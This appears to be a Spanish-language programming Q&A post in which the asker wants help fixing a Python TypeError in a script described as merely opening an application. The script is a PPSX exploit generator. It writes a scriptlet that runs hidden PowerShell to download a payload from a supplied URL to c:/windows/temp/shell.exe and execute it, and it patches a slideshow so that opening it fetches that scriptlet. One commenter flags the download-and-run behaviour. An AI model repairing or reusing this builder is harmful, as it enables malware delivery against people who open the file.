# Error python "TypeError: must be type, not classobj"

Tags: python, powershell

Tengo el siguiente código ([que obtuve de este artículo](https://www.bugbank.cn/q/article/59844808ce92c0f64be4c234.html)), que lo que hace es abrir una aplicación externa como puede ser una pagina web o un fichero por medio de un powershell.

```
import getopt
import os
import shutil

import sys
import tempfile
from zipfile import *

opts, args = getopt.getopt(sys.argv[1:], "o:p:x:", ["output_filename=", "payload_uri", "xml_uri"])

if len(args) == 0:
    print "Usage: %s input_filename -o output_filename -p payload_uri -x xml_uri\n" % os.path.basename(__file__)
    print "\tinput_filename\t\tThe input ppsx file name.\n"
    print "\t-o\t\tOutput .ppsx file name, (inlcude the .ppsx)."
    print "\t-p\t\tThe payload exe or sct file url. It must be in an accessible web server. (Optional)"
    print "\t-x\t\tThe full xml uri to be called by the ppsx file. It must be in an accessible web server.(Required)"
    sys.exit(1)

input_file_name = args[0]
output_file_name = "Output_" + args[0]
payload_uri = None
xml_uri = ""

for opt in opts:
    if opt[0] == '-o':
        output_file_name = opt[1]
    elif opt[0] == '-p':
        payload_uri = opt[1]
    elif opt[0] == '-x':
        xml_uri = opt[1]

if not xml_uri:
    print "Usage: %s input_filename -o output_filename -p payload_uri -x xml_uri\n" % os.path.basename(__file__)
    print "\tinput_filename\t\tThe input ppsx file name.\n"
    print "\t-o\t\tOutput .ppsx file name, (inlcude the .ppsx)."
    print "\t-p\t\tThe payload exe or sct file url. It must be in an accessible web server. (Optional)"
    print "\t-x\t\tThe full xml uri to be called by the ppsx file. It must be in an accessible web server.(Required)"
    sys.exit(1)

if payload_uri:
    xml_template = """<?xml version="1.0"?>
    <package>
    <component id='giffile'>
    <registration
      description='Dummy'
      progid='giffile'
      version='1.00'
      remotable='True'>
    </registration>
    <script language='JScript'>
    <![CDATA[
      new ActiveXObject('WScript.shell').exec('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'PAYLOAD_URI\', \'c:/windows/temp/shell.exe\'); c:/windows/temp/shell.exe');
    ]]>
    </script>
    </component>
    </package>"""


    f = open(xml_uri[xml_uri.rfind("/")+1:], "w")
    f.write(xml_template.replace("PAYLOAD_URI", payload_uri))
    f.close()

    print "Generated " + xml_uri[xml_uri.rfind("/")+1:] + " successfully"

def example():
    # Preparing malicious PPSX
    shutil.copy2(input_file_name, output_file_name)

    class UpdateableZipFile(ZipFile):
        """
        Add delete (via remove_file) and update (via writestr and write methods)
        To enable update features use UpdateableZipFile with the 'with statement',
        Upon  __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
        """

        class DeleteMarker(object):
            pass

        def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
            # Init base
            super(UpdateableZipFile, self).__init__(file, mode=mode,
                                                    compression=compression,
                                                    allowZip64=allowZip64)
            # track file to override in zip
            self._replace = {}
            # Whether the with statement was called
            self._allow_updates = False

        def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
            if isinstance(zinfo_or_arcname, ZipInfo):
                name = zinfo_or_arcname.filename
            else:
                name = zinfo_or_arcname
            # If the file exits, and needs to be overridden,
            # mark the entry, and create a temp-file for it
            # we allow this only if the with statement is used
            if self._allow_updates and name in self.namelist():
                temp_file = self._replace[name] = self._replace.get(name,
                                                                    tempfile.TemporaryFile())
                temp_file.write(bytes)
            # Otherwise just act normally
            else:
                super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
                                                        bytes, compress_type=compress_type)

        def write(self, filename, arcname=None, compress_type=None):
            arcname = arcname or filename
            # If the file exits, and needs to be overridden,
            # mark the entry, and create a temp-file for it
            # we allow this only if the with statement is used
            if self._allow_updates and arcname in self.namelist():
                temp_file = self._replace[arcname] = self._replace.get(arcname,
                                                                       tempfile.TemporaryFile())
                with open(filename, "rb") as source:
                    shutil.copyfileobj(source, temp_file)
            # Otherwise just act normally
            else:
                super(UpdateableZipFile, self).write(filename,
                                                     arcname=arcname, compress_type=compress_type)

        def __enter__(self):
            # Allow updates
            self._allow_updates = True
            return self

        def __exit__(self, exc_type, exc_val, exc_tb):
            # call base to close zip file, organically
            try:
                super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
                if len(self._replace) > 0:
                    self._rebuild_zip()
            finally:
                # In case rebuild zip failed,
                # be sure to still release all the temp files
                self._close_all_temp_files()
                self._allow_updates = False

        def _close_all_temp_files(self):
            for temp_file in self._replace.itervalues():
                if hasattr(temp_file, 'close'):
                    temp_file.close()

        def remove_file(self, path):
            self._replace[path] = self.DeleteMarker()

        def _rebuild_zip(self):
            tempdir = tempfile.mkdtemp()
            try:
                temp_zip_path = os.path.join(tempdir, 'new.zip')
                with ZipFile(self.filename, 'r') as zip_read:
                    # Create new zip with assigned properties
                    with ZipFile(temp_zip_path, 'w', compression=self.compression,
                                 allowZip64=self._allowZip64) as zip_write:
                        for item in zip_read.infolist():
                            # Check if the file should be replaced / or deleted
                            replacement = self._replace.get(item.filename, None)
                            # If marked for deletion, do not copy file to new zipfile
                            if isinstance(replacement, self.DeleteMarker):
                                del self._replace[item.filename]
                                continue
                            # If marked for replacement, copy temp_file, instead of old file
                            elif replacement is not None:
                                del self._replace[item.filename]
                                # Write replacement to archive,
                                # and then close it (deleting the temp file)
                                replacement.seek(0)
                                data = replacement.read()
                                replacement.close()
                            else:
                                data = zip_read.read(item.filename)
                            zip_write.writestr(item, data)
                # Override the archive with the updated one
                shutil.move(temp_zip_path, self.filename)
            finally:
                shutil.rmtree(tempdir)

    with UpdateableZipFile(output_file_name, "a") as o:
        slide_res_file = "ppt/slides/_rels/slide1.xml.rels"
        string = o.read(slide_res_file)
        if "http://192.168.56.1/calc1.sct" not in string:
            print "Copy 'Code.exe' from the template to slide 1 of the input file and save it with extension .ppsx"
            sys.exit(1)
        string = string.replace("http://192.168.56.1/calc1.sct", xml_uri)
        o.writestr(slide_res_file, string)
    print "Generated " + output_file_name + " successfully"

if xml_uri:
    example()
```

Para ejecutarlo hago lo siguiente:

```
python generate_ppsx.py -o output.ppsx -p http://url file -x http://url xml template.ppsx
```

Obtengo siguiente error cuando lo ejecuto y no sé muy bien cómo corregirlo:

> ```
> Traceback (most recent call last):
>   File "generate_ppsx.py", line 188, in <module>
>     generate_exploit_ppsx()
>   File "generate_ppsx.py", line 177, in generate_exploit_ppsx
>     with UpdateableZipFile(output_file_name, "a") as o:
>   File "generate_ppsx.py", line 81, in __init__
>     super(UpdateableZipFile, self).__init__(file, mode=mode,
> TypeError: must be type, not classobj
> ```

Lo que hago es comentar las lineas donde obtienen el error, `with UpdateableZipFile`, pero el resultado que obtengo es que no se abre por culpa del powershell.

[image: introducir la descripción de la imagen aquí]

Comment: Hola Omar, por favor, lee [ask] en el centro de ayuda para encontrar consejos para mejorar tu pregunta. Debes incluir datos como ¿qué hace el código que compartes? ¿en qué línea recibes el fallo? ¿cuál es el resultado esperado? ¿cuál es el resultado que obtienes? ¿de dónde has obtenido el código? Especialmente teniendo en cuenta que este código parece intentar ejecutar código externo en el ordenador que lo corra (no sé mucho de Python, pero parece que el script abre un PowerShell y se intenta descargar y ejecutar una URL).

Comment: actualice mi pregunta.